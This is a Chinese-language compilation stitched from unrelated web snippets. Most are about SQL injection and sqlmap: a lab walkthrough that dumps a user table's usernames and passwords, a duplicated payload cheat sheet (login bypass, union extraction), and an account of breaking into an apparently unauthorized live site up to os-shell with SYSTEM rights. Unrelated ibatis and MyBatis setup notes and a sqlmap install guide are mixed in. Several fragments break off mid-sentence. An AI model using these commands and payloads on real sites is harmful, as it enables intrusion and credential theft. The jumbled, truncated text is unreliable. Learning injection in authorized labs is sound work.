sqlmap

准备工具 Burp suite Sqlmap 实训目标 1、掌握SQL注入的基本原理； 2、了解服务器获取客户端IP的方式； 3、了解SQL注入的工具使用； 解题方向 对登录表单的各参数进行测试，找到SQL注入点，对数据库内容进行读取，找到账号与密码。 操作步骤 1.首先打开burp抓包,开启代理，代理开启点击登陆 抓取数据 2.将抓取到的数据发送到Repeater 添加x-forwarded-for:* 将raw的信息存为txt文件，如下图所示 使用Sqlmap 爆出当前的数据库 　　　　sqlmap - r 1.txt -- current - db -- batch 爆表名 　　　　sqlmap - r 1.txt - D webcalendar - T user -- columns -- batch 爆表中的字段 　　　　sqlmap - r 1.txt - D webcalendar - T user - C username , password -- dump -- batch 爆破出后台账号密码 登陆后台获得Key 来源： https://www.cnblogs.com/daiorz/p/11723075.html

工具介绍 sqlmap是一个自动化的SQL注入工具，其主要功能是扫描，发现并利用给定的URL的SQL注入漏洞，目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。采用五种独特的SQL注入技术，分别是： 1）基于布尔的盲注，即可以根据返回页面判断条件真假的注入。
 2）基于时间的盲注，即不能根据页面返回内容判断任何信息，用条件语句查看时间延迟语句是否执行（即页面返回时间是否增加）来判断。
 3）基于报错注入，即页面会返回错误信息，或者把注入的语句的结果直接返回在页面中
 4）联合查询注入，可以使用union的情况下的注入。
 5）堆查询注入，可以同时执行多条语句的执行时的注入。 使用方法 常用命令： 测试注入：python sqlmap.py -u "url" 注数据库：python sqlmap.py -u "url" --dbs 注当前数据库：python sqlmap.py -u "url" --current-db 注当前数据库用户名：python sqlmap.py -u "url" --current-user 注表名：python sqlmap.py -u "url" -D 库名 -

前段时间看了一下内网渗透，所以想找个环境练习一下，恰好有个兄弟丢了个站点出来，一起“练习内网”，然后就开始了“实战代练”。由于“懒”，所以记录时间和截图有些是补的。 0x00 外网入口点 打开站点（这里用baidu.com替代）看了看，左翻翻右翻翻能看到很明显的“注入”点。简单测试一下（and 1=1、1=2），返回不一样，所以sqlmap一把梭。 Thread 10开十个线程，跑的能快点 sqlmap -u https://baidu.com/detail.asp?Prod=2222222222 --random-agent --thread 10 估计外国站和带宽的原因，跑的很慢。所以走了一遍正常的信息收集: 真实ip:8.8.8.8Web容器:Microsoft-IIS/7.5子域名：mailserver.baidu.commail.baidu.com端口：80、443...... 发现页面登录处admin有个万能密码，登录进去发现只有查看账单的一些功能，所以没用。 C段发现用同一套模板的站，判断是属同一家，所以也注入点跑了一遍。发现这个站跑的比目标站快很多，所以先搞。 --is-dba为dba权限，故os--shell试试，权限system 两个站都是08系统+sql注入+dba权限+system权限，直接拿到权限一条龙。外网入口点太轻松，可忽略，抱着学内网的心态

ibatis学习过程 ibatis的SqlClient通过读取sqlMapConfig信息建立一个Sql客户端,而由于SqlMapConfig中对数据库进行配置,并且加载数据源不同的SqlMap映射文件,因此在ibatisTest中通过SqlClient调用其方法,然后在SqlClient中通过其新建的SqlMap客户端来调用对应的映射文件中的sql语句 SqlMap映射文件 1 <?xml version="1.0" encoding="UTF-8" ?> 2 3 <!DOCTYPE sqlMap 4 PUBLIC "-//ibatis.apache.org//DTD SQL Map 2.0//EN" 5 "http://ibatis.apache.org/dtd/sql-map-2.dtd"> 6 //命名空间 7 <sqlMap namespace="emp"> 8 9 <!-- Use type aliases to avoid typing the full classname every time. -->　　　　//别名 10 <typeAlias alias="emp" type="com.yinhai.ibatisdemo.ibatis.domain.Emp"/> 11 12 <!-- Result maps describe the mapping

sqlmap也是渗透中常用的一个注入工具，其实在注入工具方面，一个sqlmap就足够用了，只要你用的熟，秒杀各种工具，只是一个便捷性问题，sql注入另一方面就是手工党了，这个就另当别论了。今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 一共有11种常见SQLmap使用方法： 一、SQLMAP用于Access数据库注入 (1) 猜解是否能注入 1 2 win : python sqlmap.py - u " http://www.xxx.com/en/CompHonorBig.asp?id=7 " Linux : .lmap.py - u " http://www.xxx.com/en/CompHonorBig.asp?id=7 " (2) 猜解表 1 2 win : python sqlmap.py - u " http://www.xxx.com/en/CompHonorBig.asp?id=7 " --tables Linux : .lmap.py - u " http://www.xxx.com/en/CompHonorBig.asp?id=7 " --tables (3) 根据猜解的表进行猜解表的字段(假如通过2得到了admin这个表) 1 2 win : python sqlmap.py - u " http://www.xxx.com/en

MyBatis 是一个基于Java的开源的 持久层 框架 首先进行MyBatis的环境搭建 1.下载MyBatis 下载地址 https://github.com/mybatis/mybatis-3/releases 2.将MyBatis相关的包导入到工程中 将下载好的MyBatis-3.3.0.zip解压，打开文件夹 先导入mybatis-3.3.0.jar 再到入lib文件夹中所有的jar包 最后导入数据库连接驱动的jar包(例如我用的是MySQL就导入mysql-connector-java-5.1.7-bin.jar) 3.配置日志 在src下新建文件名为log4j.properties的配置文件 代码如下 log4j.rootLogger=DEBUG, Console #Console log4j.appender.Console=org.apache.log4j.ConsoleAppender log4j.appender.Console.layout=org.apache.log4j.PatternLayout log4j.appender.Console.layout.ConversionPattern=%d [%t] %-5p [%c] - %m%n log4j.logger.java.sql.ResultSet=INFO log4j.logger.org

SQL注入笔记 服务器端程序将用户输入参数作为查询条件，直接拼接SQL语句，并将查询结果返回给客户端浏览器 用户登陆判断 12 SELECT * FROM users WHERE user=‘uname' AND password=‘pass‘SELECT * FROM users WHERE user=‘name' AND password='' OR ''='‘ 基于报错的检测方法 ‘ “ % ( ) 基于布尔的检测 1’ and ‘1’=‘1 1’ and ‘1’=‘2 表列数/显示信息位于哪一列 ‘ order by 9-- select * 时表字段数=查询字段数 联合查询 ’ union select 1,2--+ ’ union all select database(),2--+ hash-identifier ' union select database(),substring_index(USER(),"@",1)-- DB用户： user() DB版本： version() 全局函数： @@datadir @@hostname @@VERSION @@version_compile_os 当前库： database() ASCII转字符： char() 连接字符串： CONCAT_WS(CHAR(32,58,32),user(),database()

SQL注入笔记 服务器端程序将用户输入参数作为查询条件，直接拼接SQL语句，并将查询结果返回给客户端浏览器 用户登陆判断 12 SELECT * FROM users WHERE user=‘uname' AND password=‘pass‘SELECT * FROM users WHERE user=‘name' AND password='' OR ''='‘ 基于报错的检测方法 ‘ “ % ( ) 基于布尔的检测 1’ and ‘1’=‘1 1’ and ‘1’=‘2 表列数/显示信息位于哪一列 ‘ order by 9-- select * 时表字段数=查询字段数 联合查询 ’ union select 1,2--+ ’ union all select database(),2--+ hash-identifier ' union select database(),substring_index(USER(),"@",1)-- DB用户： user() DB版本： version() 全局函数： @@datadir @@hostname @@VERSION @@version_compile_os 当前库： database() ASCII转字符： char() 连接字符串： CONCAT_WS(CHAR(32,58,32),user(),database()

转自：http://www.zerokeeper.com/web-security/sqlmap-usage-summary.html 0x01 需要了解 当给 sqlmap 这么一个 url 的时候，它会： 1、判断可注入的参数 2、判断可以用那种 SQL 注入技术来注入 3、识别出哪种数据库 4、根据用户选择，读取哪些数据 sqlmap 支持五种不同的注入模式： 1、基于布尔的盲注，即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注，即不能根据页面返回内容判断任何信息，用条件语句查看时间延迟语句是否执行（即页面返回时间是否增加）来判断。 3、基于报错注入，即页面会返回错误信息，或者把注入的语句的结果直接返回在页面中。 4、联合查询注入，可以使用 union 的情况下的注入。 5、堆查询注入，可以同时执行多条语句的执行时的注入。 sqlmap 支持的数据库有： MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase 和 SAP MaxDB 0x02 安装 git clone https : //github.com/sqlmapproject/sqlmap.git sqlmap-dev 0x03 Options(选项)：

sqlmap是利用python语言写的，所以需要将python这个语言环境给安装上，以下是详细安装过程 一、下载python安装包 https://www.python.org/downloads/ 1.直接双击下载好的Python2.7.11安装包，默认，Next； 2. 默认，Next；（可以自定义） 3. 将“Add python.exe to Path”项勾选，勾选后安装完成不再需要单独添加环境变量，默认是“去勾选”的； 4.安装完成后，查看是否生效，“Win+R”，输入cmd，然后输入python 二、下载sqlmap http://sqlmap.org/ 1. 将下载的sqlmap安装包解压到文件夹sqlmap中，并拷贝到 “C:\Python27” 目录下； 2. 在桌面新建立一个cmd的快捷方式，并命名为“SQLmap”； 3. 然后在新建快捷方式上右键“属性”，将“起始位置”修改为 C:\Python27\sqlmap，然后确定； 4. 双击刚才创建的快捷方式，输入sqlmap.py -h，出现如下信息则表示安装成功。 安装成功 来源： https://www.cnblogs.com/duwenjin/p/11589675.html